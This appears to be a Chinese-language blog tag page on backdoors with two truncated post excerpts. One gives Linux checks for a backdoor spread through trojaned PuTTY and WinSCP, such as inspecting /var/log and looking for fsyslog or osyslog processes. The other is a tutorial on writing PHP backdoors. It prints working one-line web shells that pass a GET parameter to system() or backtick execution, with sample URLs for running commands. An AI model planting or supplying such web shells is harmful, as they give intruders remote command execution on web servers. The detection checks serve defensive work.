首页 标签后门

putty和WinSCP后门检查及清理方式

检查及清理方式   检查/var/log 是否被删除# /usr/bin/stat /var/log   如果被删除了,说明中招了   查看/var/log 文件夹内容# ls -al /var/log   如果文件很少,说明中招了   监控名称为fsyslog,osysllog 的进程# /usr/bin/watch -n 1 /bin/ps -AFZ f | /bin/grep syslog   如果有名称为fsyslog或osyslog的进程,说明中招了,注意不要和正常的系统日志进程混淆   检查/etc/init.d/sshd 的文件头是否被篡改过# /usr/bin/head /etc/init.d/sshd   检查/etc/init.d/sendmail 的文件头是否被篡改过# /usr/bin/head /etc/i...

关于php后门的编写

0x1 原理 1、执行系统命令的函数 proc_open, popen, exec, shell_exec,passthru,system 这里只给出两个例子,其他的可以查看php手册编写   system() <?php system($_GET[‘input’]); ?> http://192.168.247.133:81/shell.php?input=dir   ““”执行命令 “执行命令等价于shell_exec()函数来执行命令。 <?php echo`$_GET[input]`; ?> http://192.168.247.133:81/shell.php?input=dir 再来个更短的 <?=@`$_GET`?> http://192.168.247.133:81/shell.php?c=dir 注:...